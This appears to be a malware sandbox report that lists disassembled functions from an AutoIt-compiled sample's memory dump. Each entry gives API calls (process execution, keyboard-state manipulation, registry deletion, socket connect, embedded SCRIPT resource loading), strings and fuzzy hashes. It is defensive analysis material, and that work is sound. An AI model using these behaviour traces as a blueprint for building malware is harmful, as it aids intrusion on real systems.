Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: a626f084315bf055552419f6d4b626ac86cc1ef7db65446853325fd7c9703233
Instruction ID: a393c5291fc51b81c532208b64d28f1746fcff041525f0f6696b19a5da001dff
Opcode Fuzzy Hash: a626f084315bf055552419f6d4b626ac86cc1ef7db65446853325fd7c9703233
Instruction Fuzzy Hash: 9971E234A04305AFEB209F54C894FBABBB5EF49322F104059FE55972A1CB75AC48FB60

Uniqueness

Uniqueness Score: -1.00%

Function 00F4FB07 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F4FB31
_memset.LIBCMT ref: 00F4FBFA
ShellExecuteExW.SHELL32(?), ref: 00F4FC3F

Part of subcall function 00ED4D37: __itow.LIBCMT ref: 00ED4D62
Part of subcall function 00ED4D37: __swprintf.LIBCMT ref: 00ED4DAC

Part of subcall function 00EE436A: _wcscpy.LIBCMT ref: 00EE438D

GetProcessId.KERNEL32(00000000), ref: 00F4FCB6
CloseHandle.KERNEL32(00000000), ref: 00F4FCE5

Strings

@, xrefs: 00F4FC0E

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 114c7ecd3b8dc9b34adf2be62d0cc092b0784713743c161c2c414b685afa48e6
Instruction ID: 7796549687ca91295d0a76781087c08e1385ced76aa4dc21541caccb302499e7
Opcode Fuzzy Hash: 114c7ecd3b8dc9b34adf2be62d0cc092b0784713743c161c2c414b685afa48e6
Instruction Fuzzy Hash: 3D61A0B5A00619DFCB14EF54C4959AEBBF5FF48310F10846AE91ABB391CB30AD45DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00F3174C Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00F3178B
GetKeyboardState.USER32(?), ref: 00F317A0
SetKeyboardState.USER32(?), ref: 00F31801
PostMessageW.USER32(?,00000101,00000010,?), ref: 00F3182F
PostMessageW.USER32(?,00000101,00000011,?), ref: 00F3184E
PostMessageW.USER32(?,00000101,00000012,?), ref: 00F31894
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00F318B7

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 0ac85c3779df44621ab719b794fadefda4282a23e2ff785b8e685833a772075d
Instruction ID: 325a9be7aa234167f727239395779c55e5e2549885ff43de7c21e33c3fe6497f
Opcode Fuzzy Hash: 0ac85c3779df44621ab719b794fadefda4282a23e2ff785b8e685833a772075d
Instruction Fuzzy Hash: 7D51D4A0E087D53DFB368624CC55BBA7EE97B06330F0C8989E0D5468C2C6D89C98F760

Uniqueness

Uniqueness Score: -1.00%

Function 00F31565 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00F315A4
GetKeyboardState.USER32(?), ref: 00F315B9
SetKeyboardState.USER32(?), ref: 00F3161A
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00F31646
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00F31663
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00F316A7
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00F316C8

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: f33a6d11febefcfd2de9f9307edcd4ce318a3fdef66d5116f5fcd9357b536b05
Instruction ID: 4c7e5aaa5985f3697ee37085520bb7579c9ffce3a7caeb7c0960e4e28abe5967
Opcode Fuzzy Hash: f33a6d11febefcfd2de9f9307edcd4ce318a3fdef66d5116f5fcd9357b536b05
Instruction Fuzzy Hash: 3651E4A0A047D53DFB328764CC56BBA7EA97B05330F0C4589E0D5468C2C794EC98F761

Uniqueness

Uniqueness Score: -1.00%

Function 00F35BB8 Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00F35BC5
_wcsncpy.LIBCMT ref: 00F35BFA
_wcsncpy.LIBCMT ref: 00F35C2C
_wcsncpy.LIBCMT ref: 00F35C5F
_wcsncpy.LIBCMT ref: 00F35CA1
_wcsncpy.LIBCMT ref: 00F35CDB
_wcsncpy.LIBCMT ref: 00F35D0A

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 7487e623a0afc9005ed7ed8d423e226412873e17bf9728a6337f0feb1c8a1154
Instruction ID: 05fbfc44e34fc79629a37e48defb3e44e92bc27d61a5dc67e09fa8377ac6935b
Opcode Fuzzy Hash: 7487e623a0afc9005ed7ed8d423e226412873e17bf9728a6337f0feb1c8a1154
Instruction Fuzzy Hash: 00419FA6C5161C75CB11FBB4C8469DFB3F8AF04320F50A866EA09E3161E734A21583A5

Uniqueness

Uniqueness Score: -1.00%

Function 00F33B64 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00F34BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F33B8A,?), ref: 00F34BE0

Part of subcall function 00F34BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F33B8A,?), ref: 00F34BF9

lstrcmpiW.KERNEL32(?,?), ref: 00F33BAA
_wcscmp.LIBCMT ref: 00F33BC6
MoveFileW.KERNEL32(?,?), ref: 00F33BDE
_wcscat.LIBCMT ref: 00F33C26
SHFileOperationW.SHELL32(?), ref: 00F33C92

Strings

\*.*, xrefs: 00F33C20

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 626d8b733f37a47f0a6aef7a69bdc20a0473e267713e02aaf2b22b95d6119344
Instruction ID: ad3dc03d4428f3d6965fa7de44b725d4df813843197e9aed4253886490b216ee
Opcode Fuzzy Hash: 626d8b733f37a47f0a6aef7a69bdc20a0473e267713e02aaf2b22b95d6119344
Instruction Fuzzy Hash: 4E41A27150C3449AC752EF64D881AEFB7ECAF88360F50196EF489D3291EB34E688D752

Uniqueness

Uniqueness Score: -1.00%

Function 00F578B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F578CF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F57976
IsMenu.USER32 ref: 00F5798E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F579D6
DrawMenuBar.USER32 ref: 00F579E9

Strings

0, xrefs: 00F578C3

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 1620d9f15f55957f2c8762d05d8939270adb1cdaa91244bc10c38c8c0a92107f
Instruction ID: c3844039d3127712b8deec94bba54d08401dd5152d77717d3ac4d0cad5d76fe3
Opcode Fuzzy Hash: 1620d9f15f55957f2c8762d05d8939270adb1cdaa91244bc10c38c8c0a92107f
Instruction Fuzzy Hash: 06416A71A08348EFDB20EF54E884E9ABBF9FB05321F148129EE5597250C770AD54EFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F51602 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00F51631
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F5165B
FreeLibrary.KERNEL32(00000000), ref: 00F51712

Part of subcall function 00F51602: RegCloseKey.ADVAPI32(?), ref: 00F51678
Part of subcall function 00F51602: FreeLibrary.KERNEL32(?), ref: 00F516CA
Part of subcall function 00F51602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00F516ED

RegDeleteKeyW.ADVAPI32(?,?), ref: 00F516B5

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 38235a6ddda225fe81c8eed923561c292643e14e139130f4b489ffedaeb7d3c2
Instruction ID: 705739539d1eb459bd8be98a12c3d12ff34b7e2b7f2f076768e30af317e499df
Opcode Fuzzy Hash: 38235a6ddda225fe81c8eed923561c292643e14e139130f4b489ffedaeb7d3c2
Instruction Fuzzy Hash: E5311C7190010DBFDB149B94DC85FFFB7BCEF08311F140169EA11A2151EAB4AE49AAA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F568F2 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00F56911
GetWindowLongW.USER32(012786F8,000000F0), ref: 00F56944
GetWindowLongW.USER32(012786F8,000000F0), ref: 00F56979
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00F569AB
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00F569D5
GetWindowLongW.USER32(00000000,000000F0), ref: 00F569E6
SetWindowLongW.USER32 ref: 00F56A00

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: c196e27bb943a391b5ef5bd07c8b1538250f00e1441bfe6411c828f6f74b7f27
Instruction ID: 6a0b8776f632770019a581eee7ab6f92661bb4ac639449ccc6d26bb538751786
Opcode Fuzzy Hash: c196e27bb943a391b5ef5bd07c8b1538250f00e1441bfe6411c828f6f74b7f27
Instruction Fuzzy Hash: F2313930A042599FDB21CF18DC88F6537E1EB49361F6901A5FA25CB2B2CB72AC44EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F2E287 Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F2E2CA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F2E2F0
SysAllocString.OLEAUT32(00000000), ref: 00F2E2F3
SysAllocString.OLEAUT32(?), ref: 00F2E311
SysFreeString.OLEAUT32(?), ref: 00F2E31A
StringFromGUID2.OLE32(?,?,00000028), ref: 00F2E33F
SysAllocString.OLEAUT32(?), ref: 00F2E34D

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 1069c516005fab9ad72015f79aec160afa647ffc7215f3750c810a3b35ed5a63
Instruction ID: 5657620cb27ede0df425223a265138489a290eb55684b41db263f7ac71d1ab97
Opcode Fuzzy Hash: 1069c516005fab9ad72015f79aec160afa647ffc7215f3750c810a3b35ed5a63
Instruction Fuzzy Hash: 85219576A0421DFF9F10DFA8DC88DBB77ACEB09360B148125FA15DB250DAB0AC459760

Uniqueness

Uniqueness Score: -1.00%

Function 00F4685E Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00F48475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00F484A0

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00F468B1
WSAGetLastError.WSOCK32(00000000), ref: 00F468C0
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00F468F9
connect.WSOCK32(00000000,?,00000010), ref: 00F46902
WSAGetLastError.WSOCK32 ref: 00F4690C
closesocket.WSOCK32(00000000), ref: 00F46935
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00F4694E

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 912614286830949b38748c1960d51404dcb2a2a1134e53572e42fda91c869d69
Instruction ID: 4310784aac1a5087f8513a4fb87eb3de262fea712d29bae3dbe35a5c3748b1bf
Opcode Fuzzy Hash: 912614286830949b38748c1960d51404dcb2a2a1134e53572e42fda91c869d69
Instruction Fuzzy Hash: 8731C471600218AFDB109F64CC85BBE7BA9EF45721F044019FD05E72D1CBB4AC45ABA2

Uniqueness

Uniqueness Score: -1.00%

Function 00F2E360 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F2E3A5
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F2E3CB
SysAllocString.OLEAUT32(00000000), ref: 00F2E3CE
SysAllocString.OLEAUT32 ref: 00F2E3EF
SysFreeString.OLEAUT32 ref: 00F2E3F8
StringFromGUID2.OLE32(?,?,00000028), ref: 00F2E412
SysAllocString.OLEAUT32(?), ref: 00F2E420

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 159750e85a3c989ff89d39d62b97c502b7f8f746fa5adc0459c3a2cc83d4439f
Instruction ID: 365cf67546be3b3547c5829bf7dc20fffd935f19b0e62b5478c725dee34a899e
Opcode Fuzzy Hash: 159750e85a3c989ff89d39d62b97c502b7f8f746fa5adc0459c3a2cc83d4439f
Instruction Fuzzy Hash: 5D216B36604118AF9B10EFB8EC88DBF77ECEB093607248565FA15CB261DAB1EC419764

Uniqueness

Uniqueness Score: -1.00%

Function 00F2FE19 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00F2FE2C
__wcsnicmp.LIBCMT ref: 00F2FE4D
__wcsnicmp.LIBCMT ref: 00F2FE67

Strings

#OnAutoItStartRegister, xrefs: 00F2FE61
#notrayicon, xrefs: 00F2FE24
#requireadmin, xrefs: 00F2FE47

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: c0e797fd739164f402962101adf50890e54869996539d712696ddf1ae5876b88
Instruction ID: d1f730d13284d3ff56c2c6d57c1c09df267a45652d76708e0889a52031815fef
Opcode Fuzzy Hash: c0e797fd739164f402962101adf50890e54869996539d712696ddf1ae5876b88
Instruction Fuzzy Hash: DC216A3351097566D332BA34EC02FBB73E89F50320F51403AF946971A3EB959D4AA395

Uniqueness

Uniqueness Score: -1.00%

Function 00F57BF2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00ED2111: CreateWindowExW.USER32 ref: 00ED214F
Part of subcall function 00ED2111: GetStockObject.GDI32(00000011), ref: 00ED2163
Part of subcall function 00ED2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00ED216D

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00F57C57
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00F57C64
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00F57C6F
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00F57C7E
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00F57C8A

Strings

Msctls_Progress32, xrefs: 00F57C28

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: fbe71d48f6f8b3a0bd56530a8aa46d0a3e0d4505c541ce5830dd5d833d5163d9
Instruction ID: 12539ba02c68a9d4d6a185c43739557ee7d61aa9665be2adf1cda1bc38bf6cbf
Opcode Fuzzy Hash: fbe71d48f6f8b3a0bd56530a8aa46d0a3e0d4505c541ce5830dd5d833d5163d9
Instruction Fuzzy Hash: 211186B255021DBEEF159F64CC85EE77F5DEF08758F014115BB04A6090C772AC25EBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00F39ED8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00F20817,?,?,00000000,00000000), ref: 00F39EE8
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00F20817,?,?,00000000,00000000), ref: 00F39EFF
LoadResource.KERNEL32(?,00000000,?,?,00F20817,?,?,00000000,00000000,?,?,?,?,?,?,00EE4A14), ref: 00F39F0F
SizeofResource.KERNEL32(?,00000000,?,?,00F20817,?,?,00000000,00000000,?,?,?,?,?,?,00EE4A14), ref: 00F39F20
LockResource.KERNEL32(00F20817,?,?,00F20817,?,?,00000000,00000000,?,?,?,?,?,?,00EE4A14,00000000), ref: 00F39F2F

Strings

SCRIPT, xrefs: 00F39EF5

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: a93633534bebb298775b5b3a2f61b7511817ff2102b4c07f4b1b3e255c419e29
Instruction ID: 0151a9811bb8f20a764bbb41f4412c6dfa9a483891c06204e7e55643aa12bb86
Opcode Fuzzy Hash: a93633534bebb298775b5b3a2f61b7511817ff2102b4c07f4b1b3e255c419e29
Instruction Fuzzy Hash: BB115A70604704AFE7248B69DC48F277BB9EFC5B21F204668F519D62A0DBF1EC04E660

Uniqueness

Uniqueness Score: -1.00%

Function 00EF9D16 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00EF9D16

Part of subcall function 00EF33B7: RtlEncodePointer.NTDLL(00000000), ref: 00EF33BA
Part of subcall function 00EF33B7: __initp_misc_winsig.LIBCMT ref: 00EF33D5
Part of subcall function 00EF33B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00EFA0D0
Part of subcall function 00EF33B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00EFA0E4
Part of subcall function 00EF33B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00EFA0F7
Part of subcall function 00EF33B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00EFA10A
Part of subcall function 00EF33B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00EFA11D
Part of subcall function 00EF33B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00EFA130
Part of subcall function 00EF33B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00EFA143
Part of subcall function 00EF33B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00EFA156
Part of subcall function 00EF33B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00EFA169
Part of subcall function 00EF33B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00EFA17C
Part of subcall function 00EF33B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00EFA18F
Part of subcall function 00EF33B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00EFA1A2
Part of subcall function 00EF33B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00EFA1B5
Part of subcall function 00EF33B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00EFA1C8
